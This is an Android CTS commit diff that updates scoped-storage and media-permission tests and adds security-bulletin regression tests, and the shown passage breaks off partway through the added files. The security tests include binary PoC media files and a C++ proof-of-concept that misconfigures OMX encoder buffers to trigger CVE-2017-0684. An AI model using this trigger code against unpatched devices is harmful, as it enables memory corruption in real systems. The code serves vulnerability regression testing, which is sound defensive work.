diff options
author | android-build-team Robot <android-build-team-robot@google.com> | 2021-02-08 23:45:13 +0000 |
---|---|---|
committer | android-build-team Robot <android-build-team-robot@google.com> | 2021-02-08 23:45:13 +0000 |
commit | 360eb33555ae49baf115469d384a2c67785abcee (patch) | |
tree | 6fede974a585c451da900b8bfd04818e69395d33 | |
parent | 3e4724c3c5110421a7c0a4a4d967e68c7d4b19ca (diff) | |
parent | ba3b03ac82e4d3a05b87bc1b29d0da84e3e66901 (diff) | |
download | cts-android11-mainline-conscrypt-release.tar.gz |
Snap for 7132927 from ba3b03ac82e4d3a05b87bc1b29d0da84e3e66901 to mainline-conscrypt-releaseandroid-mainline-11.0.0_r31android-mainline-11.0.0_r20android11-mainline-conscrypt-release
Change-Id: I4f05e80023c21fcf31a74c3b689b4bd3feda9a68
75 files changed, 2486 insertions, 223 deletions
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java index 4bf764b644d..121e33c52e2 100644 --- a/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java +++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java @@ -626,6 +626,24 @@ public class ExternalStorageHostTest extends BaseHostJUnit4Test { } @Test + public void testMediaEscalation_RequestWriteFilePathSupport() throws Exception { + // Not adding tests for MEDIA_28 and MEDIA_29 as they need W_E_S for write access via file + // path for shared files, and will always have access as they have W_E_S. + installPackage(MEDIA.apk); + + int user = getDevice().getCurrentUser(); + updatePermissions(MEDIA.pkg, user, new String[] { + PERM_READ_EXTERNAL_STORAGE, + }, false); + updatePermissions(MEDIA.pkg, user, new String[] { + PERM_WRITE_EXTERNAL_STORAGE, + }, false); + + runDeviceTests(MEDIA.pkg, MEDIA.clazz, "testMediaEscalation_RequestWriteFilePathSupport", + user); + } + + @Test public void testMediaEscalation() throws Exception { doMediaEscalation(MEDIA); } diff --git a/hostsidetests/appsecurity/test-apps/DocumentClient/src/com/android/cts/documentclient/DocumentsClientTest.java b/hostsidetests/appsecurity/test-apps/DocumentClient/src/com/android/cts/documentclient/DocumentsClientTest.java index 106434f20f4..2e785f500f9 100644 --- a/hostsidetests/appsecurity/test-apps/DocumentClient/src/com/android/cts/documentclient/DocumentsClientTest.java +++ b/hostsidetests/appsecurity/test-apps/DocumentClient/src/com/android/cts/documentclient/DocumentsClientTest.java @@ -21,6 +21,7 @@ import android.content.ContentResolver; import android.content.Intent; import android.content.IntentSender; import android.database.Cursor; +import android.graphics.Rect; import android.net.Uri; import android.os.Bundle; import android.os.SystemClock; @@ -100,9 +101,7 @@ public class DocumentsClientTest extends DocumentsClientTestCase { } private UiObject findDocument(String label) throws UiObjectNotFoundException { - final UiSelector docList = new UiSelector().resourceId( - getDocumentsUiPackageId() + ":id/container_directory").childSelector( - new UiSelector().resourceId(getDocumentsUiPackageId() + ":id/dir_list")); + final UiSelector docList = new UiSelector().resourceId(getDocumentsUiPackageId() + ":id/dir_list"); // Wait for the first list item to appear assertTrue("First list item", @@ -117,9 +116,28 @@ public class DocumentsClientTest extends DocumentsClientTestCase { //do nothing, already be in list mode. } - // Now scroll around to find our item - new UiScrollable(docList).scrollIntoView(new UiSelector().text(label)); - return new UiObject(docList.childSelector(new UiSelector().text(label))); + // Repeat swipe gesture to find our item + // (UiScrollable#scrollIntoView does not seem to work well with SwipeRefreshLayout) + UiObject targetObject = new UiObject(docList.childSelector(new UiSelector().text(label))); + UiObject saveButton = findSaveButton(); + int stepLimit = 10; + while (stepLimit-- > 0) { + if (targetObject.exists()) { + boolean targetObjectFullyVisible = !saveButton.exists() + || targetObject.getVisibleBounds().bottom + <= saveButton.getVisibleBounds().top; + if (targetObjectFullyVisible) { + break; + } + } + + mDevice.swipe(/* startX= */ mDevice.getDisplayWidth() / 2, + /* startY= */ mDevice.getDisplayHeight() / 2, + /* endX= */ mDevice.getDisplayWidth() / 2, + /* endY= */ 0, + /* steps= */ 40); + } + return targetObject; } private UiObject findSaveButton() throws UiObjectNotFoundException { diff --git a/hostsidetests/appsecurity/test-apps/MediaStorageApp/src/com/android/cts/mediastorageapp/MediaStorageTest.java b/hostsidetests/appsecurity/test-apps/MediaStorageApp/src/com/android/cts/mediastorageapp/MediaStorageTest.java index cf1d8881e7d..48172303f01 100644 --- a/hostsidetests/appsecurity/test-apps/MediaStorageApp/src/com/android/cts/mediastorageapp/MediaStorageTest.java +++ b/hostsidetests/appsecurity/test-apps/MediaStorageApp/src/com/android/cts/mediastorageapp/MediaStorageTest.java @@ -404,6 +404,52 @@ public class MediaStorageTest { } @Test + public void testMediaEscalation_RequestWriteFilePathSupport() throws Exception { + doMediaEscalation_RequestWrite_withFilePathSupport( + MediaStorageTest::createAudio); + doMediaEscalation_RequestWrite_withFilePathSupport( + MediaStorageTest::createVideo); + doMediaEscalation_RequestWrite_withFilePathSupport( + MediaStorageTest::createImage); + doMediaEscalation_RequestWrite_withFilePathSupport( + MediaStorageTest::createPlaylist); + doMediaEscalation_RequestWrite_withFilePathSupport( + MediaStorageTest::createSubtitle); + } + + private void doMediaEscalation_RequestWrite_withFilePathSupport( + Callable<Uri> create) throws Exception { + final Uri red = create.call(); + assertNotNull(red); + String path = queryForSingleColumn(red, MediaColumns.DATA); + File file = new File(path); + assertTrue(file.exists()); + assertTrue(file.canRead()); + assertTrue(file.canWrite()); + + clearMediaOwner(red, mUserId); + assertFalse(file.canWrite()); + + try (ParcelFileDescriptor pfd = mContentResolver.openFileDescriptor(red, "w")) { + fail("Expected write access to be blocked"); + } catch (SecurityException expected) { + } + + doEscalation(MediaStore.createWriteRequest(mContentResolver, Arrays.asList(red))); + + try (ParcelFileDescriptor pfd = mContentResolver.openFileDescriptor(red, "w")) { + } + + final Instrumentation inst = InstrumentationRegistry.getInstrumentation(); + final UiDevice device = UiDevice.getInstance(inst); + device.executeShellCommand("setprop sys.filepathsupport.mediauri true"); + assertTrue(file.canRead()); + assertTrue(file.canWrite()); + // TODO(b/173648980): Write to file and read back to verify. + device.executeShellCommand("setprop sys.filepathsupport.mediauri false"); + } + + @Test public void testMediaEscalation_RequestWrite() throws Exception { doMediaEscalation_RequestWrite(MediaStorageTest::createAudio); doMediaEscalation_RequestWrite(MediaStorageTest::createVideo); diff --git a/hostsidetests/bootstats/src/android/bootstats/cts/BootStatsHostTest.java b/hostsidetests/bootstats/src/android/bootstats/cts/BootStatsHostTest.java index 9bcf2a11816..fb6477d9ebc 100644 --- a/hostsidetests/bootstats/src/android/bootstats/cts/BootStatsHostTest.java +++ b/hostsidetests/bootstats/src/android/bootstats/cts/BootStatsHostTest.java @@ -38,7 +38,7 @@ import java.util.LinkedList; @RunWith(DeviceJUnit4ClassRunner.class) public class BootStatsHostTest implements IDeviceTest { - private static final long MAX_WAIT_TIME_MS = 30000; + private static final long MAX_WAIT_TIME_MS = 100000; private static final long WAIT_SLEEP_MS = 100; private static int[] ATOMS_EXPECTED = { diff --git a/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageBaseDeviceTest.java b/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageBaseDeviceTest.java new file mode 100644 index 00000000000..5299188e4c7 --- /dev/null +++ b/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageBaseDeviceTest.java @@ -0,0 +1,75 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.scopedstorage.cts.device; + +import static android.scopedstorage.cts.lib.TestUtils.getExternalFilesDir; +import static android.scopedstorage.cts.lib.TestUtils.pollForExternalStorageState; +import static android.scopedstorage.cts.lib.TestUtils.resetDefaultExternalStorageVolume; +import static android.scopedstorage.cts.lib.TestUtils.setExternalStorageVolume; +import static android.scopedstorage.cts.lib.TestUtils.setupDefaultDirectories; + +import static androidx.test.InstrumentationRegistry.getContext; + +import static com.google.common.truth.Truth.assertThat; + +import android.provider.MediaStore; +import android.scopedstorage.cts.lib.TestUtils; + +import org.junit.BeforeClass; + +import java.util.Arrays; +import java.util.List; + +class ScopedStorageBaseDeviceTest { + @BeforeClass + public static void setup() throws Exception { + createPublicVolume(); + setupStorage(); + } + + private static void createPublicVolume() throws Exception { + if (TestUtils.getCurrentPublicVolumeName() == null) { + TestUtils.createNewPublicVolume(); + } + } + + private static void setupStorage() throws Exception { + if (!getContext().getPackageManager().isInstantApp()) { + pollForExternalStorageState(); + getExternalFilesDir().mkdirs(); + } + } + + void setupExternalStorage(String volumeName) { + assertThat(volumeName).isNotNull(); + if (volumeName.equals(MediaStore.VOLUME_EXTERNAL)) { + resetDefaultExternalStorageVolume(); + TestUtils.assertDefaultVolumeIsPrimary(); + } else { + setExternalStorageVolume(volumeName); + TestUtils.assertDefaultVolumeIsPublic(); + } + setupDefaultDirectories(); + } + + static List<String> getTestParameters() { + return Arrays.asList( + MediaStore.VOLUME_EXTERNAL, + TestUtils.getCurrentPublicVolumeName() + ); + } +} diff --git a/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageDeviceTest.java b/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageDeviceTest.java index 6c80563119a..966f96d82c3 100644 --- a/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageDeviceTest.java +++ b/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageDeviceTest.java @@ -74,7 +74,6 @@ import static android.scopedstorage.cts.lib.TestUtils.installAppWithStoragePermi import static android.scopedstorage.cts.lib.TestUtils.isAppInstalled; import static android.scopedstorage.cts.lib.TestUtils.listAs; import static android.scopedstorage.cts.lib.TestUtils.openWithMediaProvider; -import static android.scopedstorage.cts.lib.TestUtils.pollForExternalStorageState; import static android.scopedstorage.cts.lib.TestUtils.queryFile; import static android.scopedstorage.cts.lib.TestUtils.queryFileExcludingPending; import static android.scopedstorage.cts.lib.TestUtils.queryImageFile; @@ -82,7 +81,6 @@ import static android.scopedstorage.cts.lib.TestUtils.queryVideoFile; import static android.scopedstorage.cts.lib.TestUtils.readExifMetadataFromTestApp; import static android.scopedstorage.cts.lib.TestUtils.revokePermission; import static android.scopedstorage.cts.lib.TestUtils.setAttrAs; -import static android.scopedstorage.cts.lib.TestUtils.setupDefaultDirectories; import static android.scopedstorage.cts.lib.TestUtils.uninstallApp; import static android.scopedstorage.cts.lib.TestUtils.uninstallAppNoThrow; import static android.scopedstorage.cts.lib.TestUtils.updateDisplayNameWithMediaProvider; @@ -119,14 +117,12 @@ import android.os.FileUtils; import android.os.ParcelFileDescriptor; import android.os.Process; import android.provider.MediaStore; -import android.scopedstorage.cts.lib.TestUtils; import android.system.ErrnoException; import android.system.Os; import android.system.StructStat; import android.util.Log; import androidx.annotation.Nullable; -import androidx.test.runner.AndroidJUnit4; import com.android.cts.install.lib.TestApp; @@ -137,6 +133,9 @@ import org.junit.Before; import org.junit.BeforeClass; import org.junit.Test; import org.junit.runner.RunWith; +import org.junit.runners.Parameterized; +import org.junit.runners.Parameterized.Parameter; +import org.junit.runners.Parameterized.Parameters; import java.io.File; import java.io.FileDescriptor; @@ -153,8 +152,8 @@ import java.util.List; /** * Device-side test suite to verify scoped storage business logic. */ -@RunWith(AndroidJUnit4.class) -public class ScopedStorageDeviceTest { +@RunWith(Parameterized.class) +public class ScopedStorageDeviceTest extends ScopedStorageBaseDeviceTest { public static final String STR_DATA1 = "Just some random text"; public static final byte[] BYTES_DATA1 = STR_DATA1.getBytes(); @@ -209,20 +208,12 @@ public class ScopedStorageDeviceTest { private static final String OPSTR_MANAGE_EXTERNAL_STORAGE = permissionToOp(Manifest.permission.MANAGE_EXTERNAL_STORAGE); - @BeforeClass - public static void verifyTestsWillRunOnPrimaryVolume() throws Exception { - TestUtils.resetDefaultExternalStorageVolume(); - TestUtils.assertDefaultVolumeIsPrimary(); - } + @Parameter(0) + public String mVolumeName; - @BeforeClass - public static void createPublicVolume() throws Exception { - // Create a public volume. It's not used in this test right now, but it makes for a less - // flaky test to create here. ScopedStoragePublicVolumeDeviceTest will be folded into - // this test later, as a prametererized option, as tracked in b/159593019. - if (TestUtils.getCurrentPublicVolumeName() == null) { - TestUtils.createNewPublicVolume(); - } + @Parameters + public static Iterable<? extends Object> data() { + return ScopedStorageDeviceTest.getTestParameters(); } @BeforeClass @@ -245,14 +236,6 @@ public class ScopedStorageDeviceTest { Manifest.permission.WRITE_EXTERNAL_STORAGE)).isTrue(); } - @BeforeClass - public static void setupStorage() throws Exception { - if (!getContext().getPackageManager().isInstantApp()) { - pollForExternalStorageState(); - getExternalFilesDir().mkdirs(); - } - } - @After public void tearDown() throws Exception { executeShellCommand("rm -r /sdcard/Android/data/com.android.shell"); @@ -260,7 +243,8 @@ public class ScopedStorageDeviceTest { @Before public void setupExternalStorage() { - setupDefaultDirectories(); + super.setupExternalStorage(mVolumeName); + Log.i(TAG, "Using volume : " + mVolumeName); } /** @@ -1113,6 +1097,36 @@ public class ScopedStorageDeviceTest { } } + @Test + public void testInsertDefaultPrimaryCaseInsensitiveCheck() throws Exception { + final File podcastsDir = getPodcastsDir(); + final File podcastsDirLowerCase = + new File(getExternalStorageDir(), Environment.DIRECTORY_PODCASTS.toLowerCase()); + final File fileInPodcastsDirLowerCase = new File(podcastsDirLowerCase, AUDIO_FILE_NAME); + try { + // Delete the directory if it already exists + if (podcastsDir.exists()) { + deleteAsLegacyApp(podcastsDir); + } + assertThat(podcastsDir.exists()).isFalse(); + assertThat(podcastsDirLowerCase.exists()).isFalse(); + + // Create the directory with lower case + assertThat(podcastsDirLowerCase.mkdir()).isTrue(); + // Because of case-insensitivity, even though directory is created + // with lower case, we should be able to see both directory names. + assertThat(podcastsDirLowerCase.exists()).isTrue(); + assertThat(podcastsDir.exists()).isTrue(); + + // File creation with lower case path of podcasts directory should not fail + assertThat(fileInPodcastsDirLowerCase.createNewFile()).isTrue(); + } finally { + fileInPodcastsDirLowerCase.delete(); + deleteAsLegacyApp(podcastsDirLowerCase); + podcastsDir.mkdirs(); + } + } + private void createDeleteCreate(File create, File delete) throws Exception { try { assertThat(create.createNewFile()).isTrue(); diff --git a/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStoragePublicVolumeDeviceTest.java b/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStoragePublicVolumeDeviceTest.java deleted file mode 100644 index 20f4274e7c6..00000000000 --- a/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStoragePublicVolumeDeviceTest.java +++ /dev/null @@ -1,58 +0,0 @@ -/* - * Copyright (C) 2020 The Android Open Source Project - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -package android.scopedstorage.cts.device; - -import static com.google.common.truth.Truth.assertThat; - -import android.scopedstorage.cts.lib.TestUtils; - -import androidx.test.runner.AndroidJUnit4; - -import org.junit.AfterClass; -import org.junit.BeforeClass; -import org.junit.runner.RunWith; - -/** - * Test suite to run ScopedStorageDeviceTest on a public volume. - */ -@RunWith(AndroidJUnit4.class) -public class ScopedStoragePublicVolumeDeviceTest extends ScopedStorageDeviceTest { - - @BeforeClass - public static void createPublicVolume() throws Exception { - ScopedStorageDeviceTest.createPublicVolume(); - } - - @BeforeClass - public static void setupApps() throws Exception { - ScopedStorageDeviceTest.setupApps(); - } - - @AfterClass - public static void resetDefaultVolume() throws Exception { - TestUtils.resetDefaultExternalStorageVolume(); - } - - @BeforeClass - public static void setupStorage() throws Exception { - String volumeName = TestUtils.getPublicVolumeName(); - assertThat(volumeName).isNotNull(); - TestUtils.setExternalStorageVolume(volumeName); - TestUtils.assertDefaultVolumeIsPublic(); - ScopedStorageDeviceTest.setupStorage(); - } -} diff --git a/hostsidetests/scopedstorage/host/src/android/scopedstorage/cts/host/ScopedStorageHostTest.java b/hostsidetests/scopedstorage/host/src/android/scopedstorage/cts/host/ScopedStorageHostTest.java index 91e0915a304..26be94c0bdc 100644 --- a/hostsidetests/scopedstorage/host/src/android/scopedstorage/cts/host/ScopedStorageHostTest.java +++ b/hostsidetests/scopedstorage/host/src/android/scopedstorage/cts/host/ScopedStorageHostTest.java @@ -105,6 +105,16 @@ public class ScopedStorageHostTest extends BaseHostTestCase { } @Test + public void testManageExternalStorageCannotRenameAndroid() throws Exception { + allowAppOps("android:manage_external_storage"); + try { + runDeviceTest("testManageExternalStorageCannotRenameAndroid"); + } finally { + denyAppOps("android:manage_external_storage"); + } + } + + @Test public void testManageExternalStorageCantReadWriteOtherAppExternalDir() throws Exception { allowAppOps("android:manage_external_storage"); try { diff --git a/hostsidetests/scopedstorage/libs/ScopedStorageTestLib/src/android/scopedstorage/cts/lib/TestUtils.java b/hostsidetests/scopedstorage/libs/ScopedStorageTestLib/src/android/scopedstorage/cts/lib/TestUtils.java index 8d25bc421a5..80a90c18b10 100644 --- a/hostsidetests/scopedstorage/libs/ScopedStorageTestLib/src/android/scopedstorage/cts/lib/TestUtils.java +++ b/hostsidetests/scopedstorage/libs/ScopedStorageTestLib/src/android/scopedstorage/cts/lib/TestUtils.java @@ -21,6 +21,7 @@ import static android.scopedstorage.cts.lib.RedactionTestHelper.EXIF_METADATA_QU import static androidx.test.InstrumentationRegistry.getContext; import static com.google.common.truth.Truth.assertThat; +import static com.google.common.truth.Truth.assertWithMessage; import static org.junit.Assert.fail; @@ -123,8 +124,10 @@ public class TestUtils { */ public static void setupDefaultDirectories() { for (File dir : getDefaultTopLevelDirs()) { - dir.mkdir(); - assertThat(dir.exists()).isTrue(); + dir.mkdirs(); + assertWithMessage("Could not setup default dir [%s]", dir.toString()) + .that(dir.exists()) + .isTrue(); } } diff --git a/hostsidetests/scopedstorage/src/android/scopedstorage/cts/ScopedStorageTest.java b/hostsidetests/scopedstorage/src/android/scopedstorage/cts/ScopedStorageTest.java index 0f0447fbd63..be8dec65ebe 100644 --- a/hostsidetests/scopedstorage/src/android/scopedstorage/cts/ScopedStorageTest.java +++ b/hostsidetests/scopedstorage/src/android/scopedstorage/cts/ScopedStorageTest.java @@ -369,6 +369,15 @@ public class ScopedStorageTest { } @Test + public void testManageExternalStorageCannotRenameAndroid() throws Exception { + pollForManageExternalStorageAllowed(); + + final File androidDir = getAndroidDir(); + final File fooDir = new File(getAndroidDir().getAbsolutePath() + "foo"); + assertThat(androidDir.renameTo(fooDir)).isFalse(); + } + + @Test public void testManageExternalStorageReaddir() throws Exception { pollForManageExternalStorageAllowed(); diff --git a/hostsidetests/securitybulletin/res/cve_2017_0726.mp4 b/hostsidetests/securitybulletin/res/cve_2017_0726.mp4 Binary files differnew file mode 100644 index 00000000000..2e30e91d1cd --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2017_0726.mp4 diff --git a/hostsidetests/securitybulletin/res/cve_2020_0381.info b/hostsidetests/securitybulletin/res/cve_2020_0381.info Binary files differnew file mode 100644 index 00000000000..510c136cc08 --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2020_0381.info diff --git a/hostsidetests/securitybulletin/res/cve_2020_0381.xmf b/hostsidetests/securitybulletin/res/cve_2020_0381.xmf Binary files differnew file mode 100644 index 00000000000..cbe4bbc75ed --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2020_0381.xmf diff --git a/hostsidetests/securitybulletin/res/cve_2020_0384.info b/hostsidetests/securitybulletin/res/cve_2020_0384.info Binary files differnew file mode 100644 index 00000000000..e74b507b210 --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2020_0384.info diff --git a/hostsidetests/securitybulletin/res/cve_2020_0384.xmf b/hostsidetests/securitybulletin/res/cve_2020_0384.xmf Binary files differnew file mode 100644 index 00000000000..5056ce39a6b --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2020_0384.xmf diff --git a/hostsidetests/securitybulletin/res/cve_2020_0385.info b/hostsidetests/securitybulletin/res/cve_2020_0385.info Binary files differnew file mode 100644 index 00000000000..f0d0459372e --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2020_0385.info diff --git a/hostsidetests/securitybulletin/res/cve_2020_0385.xmf b/hostsidetests/securitybulletin/res/cve_2020_0385.xmf Binary files differnew file mode 100644 index 00000000000..6437f9e7bb2 --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2020_0385.xmf diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/Android.bp new file mode 100644 index 00000000000..ad70e63e8b8 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/Android.bp @@ -0,0 +1,44 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ +cc_test { + name: "CVE-2017-0684", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_omxutils", + ], + shared_libs: [ + "libstagefright", + "libbinder", + "libmedia_omx", + "libutils", + "liblog", + "libui", + "libstagefright_foundation", + "libcutils", + "libhidlbase", + "libhidlmemory", + "android.hidl.allocator@1.0", + "android.hardware.media.omx@1.0", + ], + include_dirs: [ + "frameworks/native/include/media/openmax", + "frameworks/av/media/libstagefright", + "frameworks/native/include/media/hardware", + ], + compile_multilib: "32", +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/poc.cpp new file mode 100644 index 00000000000..9b76c7b3b2a --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/poc.cpp @@ -0,0 +1,139 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdlib.h> +#include "../includes/common.h" +#include "../includes/omxUtils.h" + +sp<IAllocator> mAllocator = IAllocator::getService("ashmem"); + +int allocateHidlPortBuffers(OMX_U32 portIndex, + Vector<Buffer> *buffers) { + buffers->clear(); + OMX_PARAM_PORTDEFINITIONTYPE def; + int err = omxUtilsGetParameter(portIndex, &def); + omxExitOnError(err); + for (OMX_U32 i = 0; i < def.nBufferCountActual; ++i) { + Buffer buffer; + buffer.mFlags = 0; + bool success; + auto transStatus = mAllocator->allocate(def.nBufferSize, + [&success, &buffer]( + bool s, + hidl_memory const& m) { + success = s; + buffer.mHidlMemory = m; + }); + omxExitOnError(!transStatus.isOk()); + omxExitOnError(!success); + omxUtilsUseBuffer(portIndex, buffer.mHidlMemory, &buffer.mID); + buffers->push(buffer); + } + return OK; +} + +int main() { + + /* Initialize OMX for the specified codec */ + status_t ret = omxUtilsInit((char *) "OMX.google.h264.encoder"); + omxExitOnError(ret); + /* Get OMX input port parameters */ + OMX_PARAM_PORTDEFINITIONTYPE *params = + (OMX_PARAM_PORTDEFINITIONTYPE *) malloc( + sizeof(OMX_PARAM_PORTDEFINITIONTYPE)); + memset(params, 0, sizeof(OMX_PARAM_PORTDEFINITIONTYPE)); + omxUtilsGetParameter(OMX_UTILS_IP_PORT, params); + int ipBufferCount = params->nBufferCountActual; + /* Set port mode */ + omxUtilsSetPortMode(OMX_UTILS_IP_PORT, IOMX::kPortModeDynamicANWBuffer); + /* Allocate input buffers and graphic buffer */ + sp<GraphicBuffer> graphicbuffer = new GraphicBuffer( + params->format.video.nFrameWidth, params->format.video.nFrameHeight, + HAL_PIXEL_FORMAT_RGBX_8888, + android::GraphicBuffer::USAGE_HW_VIDEO_ENCODER, "me"); + int i; + Vector<Buffer> inputBuffers; + Vector<Buffer> outputBuffers; + /* Register input buffers with OMX component */ + allocateHidlPortBuffers(OMX_UTILS_IP_PORT, &inputBuffers); + /* Get OMX output port parameters */ + memset(params, 0, sizeof(OMX_PARAM_PORTDEFINITIONTYPE)); + omxUtilsGetParameter(OMX_UTILS_OP_PORT, params); + int opBufferSize = params->nBufferSize; + int opBufferCount = params->nBufferCountActual; + allocateHidlPortBuffers(OMX_UTILS_OP_PORT, &outputBuffers); + /* Do OMX State chage to Idle */ + omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle); + /* Do OMX State chage to Executing */ + omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateExecuting); + /* Empty input buffers and fill output buffers */ + OMXBuffer omxIpBuf(graphicbuffer); + omxUtilsEmptyBuffer(inputBuffers[0].mID, omxIpBuf, 0, 0, -1); + OMXBuffer omxOpBuf(0, opBufferSize); + omxUtilsFillBuffer(outputBuffers[0].mID, omxOpBuf, -1); + /* Do OMX State chage to Idle */ + omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle); + /* Do OMX State chage to Loaded */ + omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateLoaded); + /* Free input and output buffers */ + for (i = 0; i < ipBufferCount; i++) { + omxUtilsFreeBuffer(OMX_UTILS_IP_PORT, inputBuffers[i].mID); + } + for (i = 0; i < opBufferCount; i++) { + omxUtilsFreeBuffer(OMX_UTILS_OP_PORT, outputBuffers[i].mID); + } + /*********************************************************************/ + /* Following code exposes vulnerability */ + /*********************************************************************/ + Vector<Buffer> newInputBuffers; + Vector<Buffer> newOutputBuffers; + /* Get OMX input port parameters, change settings and set output port*/ + /* port parameters */ + memset(params, 0, sizeof(OMX_PARAM_PORTDEFINITIONTYPE)); + omxUtilsGetParameter(OMX_UTILS_IP_PORT, params); + params->nBufferSize = 38016; + params->format.video.nFrameWidth = 2000; + params->format.video.nFrameHeight = 2000; + omxUtilsSetParameter(OMX_UTILS_IP_PORT, params); + /* Allocated input buffers and register with OMX component */ + allocateHidlPortBuffers(OMX_UTILS_IP_PORT, &newInputBuffers); + /* Allocated output buffers and register with OMX component */ + allocateHidlPortBuffers(OMX_UTILS_OP_PORT, &newOutputBuffers); + /* Do OMX State chage to Idle */ + omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle); + /* Do OMX State chage to Executing */ + omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateExecuting); + /* Empty input buffers and fill output buffers */ + OMXBuffer newOmxIpBuf(graphicbuffer); + omxUtilsEmptyBuffer(newInputBuffers[0].mID, newOmxIpBuf, 0, 0, -1); + OMXBuffer newOmxOpBuf(0, opBufferSize); + omxUtilsFillBuffer(newOutputBuffers[0].mID, newOmxOpBuf, -1); + /* Do OMX State change to Idle */ + omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle); + /* Do OMX State change to Loaded */ + omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateLoaded); + /* Free input and output buffers */ + for (i = 0; i < ipBufferCount; i++) { + omxUtilsFreeBuffer(OMX_UTILS_IP_PORT, newInputBuffers[i].mID); + } + for (i = 0; i < opBufferCount; i++) { + omxUtilsFreeBuffer(OMX_UTILS_OP_PORT, newOutputBuffers[i].mID); + } + /* Free OMX resources */ + omxUtilsFreeNode(); + + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/Android.bp new file mode 100644 index 00000000000..32959f2090b --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/Android.bp @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2017-0726", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils_track", + ], + include_dirs: [ + "frameworks/av/media/libmedia/include", + ], + shared_libs: [ + "libdatasource", + "libstagefright", + "libstagefright_foundation", + "libutils", + "liblog", + ], + cflags: [ + "-DCHECK_MEMORY_LEAK", + "-DENABLE_SELECTIVE_OVERLOADING", + ] +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/poc.cpp new file mode 100644 index 